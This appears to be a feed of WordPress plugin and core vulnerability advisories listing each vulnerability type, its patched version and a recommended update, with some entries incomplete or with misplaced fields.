Vulnerability: Reflected Cross-Site Scripting
Patched Version: 115
Recommended Action: Update to version 115, or a newer patched version

Plugin: Daily Prayer Time

Vulnerability: Cross-Site Request Forgery
Patched Version: 2023.03.17
Recommended Action: Update to version 2023.03.17, or a newer patched version

Plugin: Quick Contact Form

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.0.4
Recommended Action: Update to version 8.0.4, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Unprotected Functions
Patched Version: 8.0.33
Recommended Action: Update to version 8.0.33, or a newer patched version

Plugin: Custom Admin Login Page | WPZest

Plugin: Fancier Author Box by ThematoSoup

Plugin: WP Post Statistics (Visitors & Visits Counter)

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: DTracker

Plugin: furikake

Vulnerability: Open Redirect
Patched Version: 0.1.1
Recommended Action: Update to version 0.1.1, or a newer patched version

Plugin: YouTube Embed, Playlist and Popup by WpDevArt

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: Sermon Browser

Vulnerability: SQL Injection
Patched Version: 0.43.6
Recommended Action: Update to version 0.43.6, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: IP Spoofing via HTTP header
Patched Version: 6.1
Recommended Action: Update to version 6.1, or a newer patched version

Plugin: Ultimate Addons for WPBakery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.19.15
Recommended Action: Update to version 3.19.15, or a newer patched version

Plugin: WP Job Board

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.6.0
Recommended Action: Update to version 5.6.0, or a newer patched version

Plugin: underConstruction

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.09
Recommended Action: Update to version 1.09, or a newer patched version

Plugin: Moosend Website Connector

Vulnerability: Missing Authorization
Patched Version: 1.0.190
Recommended Action: Update to version 1.0.190, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 5.5.6
Recommended Action: Update to version 5.5.6, or a newer patched version

Plugin: Namaste! LMS

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.5.9.2
Recommended Action: Update to version 2.5.9.2, or a newer patched version

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Scripting via wpglobus_option[post_type][post]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: ShortCodes UI

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.4.13
Recommended Action: Update to version 5.4.13, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via header_size
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Age Verification

Vulnerability: Open Redirect
Patched Version: 0.5
Recommended Action: Update to version 0.5, or a newer patched version

Plugin: Game tabs

Plugin: WP Education – Education WordPress Plugin for Elementor

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Ultimate Addons for WPBakery

Vulnerability: Cross-Site Scripting
Patched Version: 3.16.12
Recommended Action: Update to version 3.16.12, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Missing Authorization on jobsearch_update_job_import_schedule_call() function
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Uploading SVG, WEBP and ICO files

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: GDPR Cookie Compliance – Cookie Banner, Cookie Consent, Cookie Notice – CCPA, DSGVO, RGPD

Vulnerability: Missing Authorization
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.119.1
Recommended Action: Update to version 1.0.119.1, or a newer patched version

Plugin: BackupBuddy

Vulnerability: 8.7.4.1
Patched Version: 8.7.5
Recommended Action: Update to version 8.7.5, or a newer patched version

Plugin: GigPress

Vulnerability: SQL Injection
Patched Version: 2.3.11
Recommended Action: Update to version 2.3.11, or a newer patched version

Plugin: Pricing Table Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: a3 Portfolio

Vulnerability: Cross-Site Request Forgery to Settings Changes
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via ip
Patched Version: 1.3.2.4
Recommended Action: Update to version 1.3.2.4, or a newer patched version

Plugin: Skype Legacy Buttons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Search Analytics for WP

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Cookie Notice & Compliance for GDPR / CCPA

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘cookies_revoke_shortcode’ Shortcode
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Events Made Easy

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.5.50
Recommended Action: Update to version 1.5.50, or a newer patched version

Plugin: menu shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: User Metadata Information Disclosure
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting via form fields
Patched Version: 2.45.1
Recommended Action: Update to version 2.45.1, or a newer patched version

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: Stored Cross-Site Scripting via Gallery Description
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEOPress – On-site SEO

Vulnerability: 5.0.3
Patched Version: 5.0.4
Recommended Action: Update to version 5.0.4, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.6
Recommended Action: Update to version 3.5.6, or a newer patched version

Plugin: IP Metaboxes

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: wp-rocket

Vulnerability: Local File Inclusion
Patched Version: 2.10.4
Recommended Action: Update to version 2.10.4, or a newer patched version

Plugin: IMPress for IDX Broker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: All-in-One Addons for Elementor – WidgetKit

Vulnerability: WidgetKit <= 2.3.9
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: LetsRecover – WooCommerce Abandoned Cart Notifications

Vulnerability: Unauthenticated SQL Injection via AJAX action
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Profile Extra Fields by BestWebSoft

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: WP Replicate Post

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Advanced Youtube Channel Pagination

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CPO Companion

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Feed Changer & Remover

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: Pixabay Images

Vulnerability: Arbitrary File Upload
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Newsletter Manager

Vulnerability: Cross-Site Scripting via test_mail.php
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: IURNY by INDIGITALL – WhatsApp Chat, Web Push Notifications (FREE)

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP User – Custom Registration Forms, Login and User Profile

Plugin: Inline Google Maps

Plugin: RSS Feed Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Image vertical reel scroll slideshow

Plugin: Video Gallery – YouTube Playlist, Channel Gallery by YotuWP

Vulnerability: Missing Authorization
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: 3.0.20
Patched Version: 3.0.21
Recommended Action: Update to version 3.0.21, or a newer patched version

Plugin: Envato Sales By Item

Vulnerability: Unauthenticated SQL Injection via AJAX call
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Table Builder – WordPress Table Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Walk Score Plugin

Plugin: Back In Stock Notifier for WooCommerce | Manage Inventory and Waitlist Product for WooCommerce

Vulnerability: Information Disclosure
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: All custom fields & groups

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.05
Recommended Action: Update to version 1.05, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery via Widget Editing
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: Translate WordPress – Google Language Translator

Vulnerability: Missing Authorization via admin notifications
Patched Version: 6.0.20
Recommended Action: Update to version 6.0.20, or a newer patched version

Plugin: tencentcloud-cos

Vulnerability: Missing Authorization via AJAX actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YouTube WordPress Plugin by Embed Plus

Vulnerability: Cross-Site Request Forgery
Patched Version: 11.8.2
Recommended Action: Update to version 11.8.2, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Privilege Escalation via accept-to-be-teacher action parameter
Patched Version: 3.2.6.9
Recommended Action: Update to version 3.2.6.9, or a newer patched version

Plugin: Simple Cloudflare Turnstile – CAPTCHA Alternative

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.23.2
Recommended Action: Update to version 1.23.2, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 2.9.6
Recommended Action: Update to version 2.9.6, or a newer patched version

Plugin: WP Cumulus

Vulnerability: Cross-Site Scripting via xmlpath
Patched Version: 1.23
Recommended Action: Update to version 1.23, or a newer patched version

Plugin: AutomateWoo

Vulnerability: Authenticated (Shop manager+) SQL Injection
Patched Version: 5.7.2
Recommended Action: Update to version 5.7.2, or a newer patched version

Plugin: Video.js – HTML5 Video Player for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Jobs

Vulnerability: SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: multi Scheduler

Plugin: LayerSlider

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.7.10
Recommended Action: Update to version 7.7.10, or a newer patched version

Plugin: Contact Form 7

Vulnerability: Arbitrary File Upload
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: BBS e-Franchise

Vulnerability: SQL Injection
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Open Graph and Twitter Card Tags

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.2.4.2
Recommended Action: Update to version 2.2.4.2, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Missing Authorization
Patched Version: 12.1.21
Recommended Action: Update to version 12.1.21, or a newer patched version

Plugin: Content Egg

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.5.0
Recommended Action: Update to version 5.5.0, or a newer patched version

Plugin: Contact List – Online Staff Directory and Address Book

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.42
Recommended Action: Update to version 2.9.42, or a newer patched version

Plugin: 2kb Amazon Affiliates Store

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Unauthenticated Arbitrary Post Deletion
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Elementor Addons, Widgets and Enhancements – Stax

Vulnerability: Missing Authorization in toggle_widget
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: DPD Baltic Shipping

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: Easy Social Like Box – Popup – Sidebar Widget

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Seriously Simple Stats

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: File Manager Pro – Filester

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Click to Call or Chat Buttons

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: SQL Injection
Patched Version: 2.56
Recommended Action: Update to version 2.56, or a newer patched version

Plugin: Social Share Boost

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ssboost shortcode
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Gallery PhotoBlocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: ManageWP Worker

Vulnerability: Authentication Bypass
Patched Version: 4.9.3
Recommended Action: Update to version 4.9.3, or a newer patched version

Plugin: DevBuddy Twitter Feed

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Authenticated(Contributor+) Clickjacking via Iframe Injection
Patched Version: 12.7
Recommended Action: Update to version 12.7, or a newer patched version

Plugin: Vrm 360 3D Model Viewer

Vulnerability: Authenticated (Contributor+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CSV Import

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Donations Made Easy – Smart Donations

Plugin: RokNewsPager

Vulnerability: Cross-Site Scripting
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: 2Way VideoCalls and Random Chat – HTML5 Webcam Videochat

Vulnerability: Cross-Site Scripting
Patched Version: 4.41.2
Recommended Action: Update to version 4.41.2, or a newer patched version

Plugin: Subscribe2 – Form, Email Subscribers & Newsletters

Vulnerability: Cross-Site Request Forgery
Patched Version: 10.41
Recommended Action: Update to version 10.41, or a newer patched version

Plugin: BetterLinks – An Advanced Solution for Affiliate Link Management, Link Shortening, Link Tracking, Link Branding & Marketing

Vulnerability: Improper Authorization to Data Import and Export
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Owl Carousel

Plugin: Advanced Order Export For WooCommerce

Vulnerability: CSV Injection
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Mortgage Calculators WP

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.53
Recommended Action: Update to version 1.53, or a newer patched version

Plugin: Global Flash Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 0.13.4
Recommended Action: Update to version 0.13.4, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: SQL Injection
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: GoCodes

Vulnerability: Authenticated Blind SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Learn Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: HTML Forms – Simple WordPress Forms Plugin

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.3.25
Recommended Action: Update to version 1.3.25, or a newer patched version

Plugin: Google Analytics 4 (GA4), Google Ads, Meta Pixel, GTM & Multiple Pixels for Woocommerce & WordPress

Vulnerability: Google Analytics and Google Shopping plugin for WooCommerce <= 4.6.1 Authenticated SQL Injection
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: Albo Pretorio On line

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.7
Recommended Action: Update to version 4.7, or a newer patched version

Plugin: Image Hover Effects For WPBakery Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: MF Gig Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via event_title and event_time
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WooFramework Branding

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Auto Login New User After Registration

Vulnerability: Cross-Site Request Forgery to Settings Modification
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cookie Information | Free GDPR Consent Solution

Vulnerability: Arbitrary Options Update and Action Calling
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: WP Simple Booking Calendar

Vulnerability: Authenticated SQL Injection
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Newsletter by Supsystic

Vulnerability: Authenticated (Admin+) Time-Based Blind SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: PrePost SEO

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 4.1.7
Recommended Action: Update to version 4.1.7, or a newer patched version

Plugin: PWA for WP & AMP

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: SQL Injection
Patched Version: 1.13.36
Recommended Action: Update to version 1.13.36, or a newer patched version

Plugin: Cron Setup and Monitor – Get URL Cron

Vulnerability: Cross-Site Request Forgery via geturlcron_action_handle
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authentication Bypass
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: JetWidgets For Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Memberlite Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Shipyaari Shipping Management

Plugin: Advanced Cron Manager – debug & control

Vulnerability: Subscriber+ Arbitrary Events/Schedules Creation/Deletion
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Pickup | Delivery | Dine-in date time

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Authenticated (Admin+) Local File Inclusion via import_file_url
Patched Version: 5.4.3
Recommended Action: Update to version 5.4.3, or a newer patched version

Plugin: Calculated Fields Form

Vulnerability: Missing Authorization to Feedback Submission
Patched Version: 1.1.121
Recommended Action: Update to version 1.1.121, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Weak validation of Amazon SNS push messages
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Void Contact Form 7 Widget For Elementor Page Builder

Vulnerability: Missing Authorization
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: WordPress Simple Shop

Plugin: Salon Booking System

Vulnerability: Cross-Site Request Forgery to Admin Role Change to Customer, User Meta Update via save_customer
Patched Version: 8.4.8
Recommended Action: Update to version 8.4.8, or a newer patched version

Plugin: Developer Formatter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2013.0.1.41
Recommended Action: Update to version 2013.0.1.41, or a newer patched version

Plugin: Special Text Boxes

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.9.110
Recommended Action: Update to version 5.9.110, or a newer patched version

Plugin: flash-player-widget

Plugin: Master Slider – Responsive Touch Slider

Vulnerability: Responsive Touch Slider <= 2.5.1
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Icegram Collect – Easy Form, Lead Collection and Subscription plugin

Vulnerability: Authenticated(Contributor+) Cross-Site Scripting via Shortcode
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Missing Authorization
Patched Version: 3.2.11
Recommended Action: Update to version 3.2.11, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Mailchimp API Key
Patched Version: 1.3.2.3
Recommended Action: Update to version 1.3.2.3, or a newer patched version

Plugin: Seed Social

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: SQL injection
Patched Version: 8.4.4
Recommended Action: Update to version 8.4.4, or a newer patched version

Plugin: Big File Uploads – Increase Maximum File Upload Size

Vulnerability: Cross-Site Request Forgery via actions
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Video Gallery – YouTube Playlist, Channel Gallery by YotuWP

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.13
Recommended Action: Update to version 1.3.13, or a newer patched version

Plugin: NEX-Forms Lite – WordPress Contact Form builder

Vulnerability: Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: WP EXtra

Vulnerability: Missing Authorization to Arbitrary Email Sending
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Donate Extra

Plugin: Download Monitor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to one of the following versions, or a newer patched version: 1.6.5, 1.7.1

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: SpiderVPlayer

Plugin: WebToffee WP Backup and Migration

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: BulkGate SMS Plugin for WooCommerce

Vulnerability: Missing Authorization via Multiple AJAX Actions
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Side Menu Lite – add sticky fixed buttons

Vulnerability: add sticky fixed buttons < 2.2.6
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Firewall & Malware Scan <= 3.3.6
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Authenticated SQL Injection
Patched Version: 1.13.3
Recommended Action: Update to version 1.13.3, or a newer patched version

Core: WordPress

Vulnerability: Improper Authorization Checks
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: All In One Login — WordPress Login Security Plugin to Protect and Customize WP Admin

Vulnerability: Protection Mechanism Failure to Login Page Disclosure
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: 3.9.4
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: WooCommerce PayU India (PayUmoney – PayUbiz)

Vulnerability: Improper Input Validation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Latest Posts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.5
Recommended Action: Update to version 3.7.5, or a newer patched version

Plugin: Woody code snippets – Insert Header Footer Code, AdSense Ads

Vulnerability: Missing Authorization to Settings Import
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Nokia Maps & Places

Vulnerability: Open Redirect
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Swift SMTP (formerly Welcome Email Editor)

Vulnerability: Missing Authorization via ajax_handler
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Premium Addons Pro for Elementor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.25
Recommended Action: Update to version 2.8.25, or a newer patched version

Plugin: WordPress Survey & Poll – Quiz, Survey and Poll Plugin for WordPress

Vulnerability: SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WordPress Security – Firewall, Malware Scanner, Secure Login and Backup

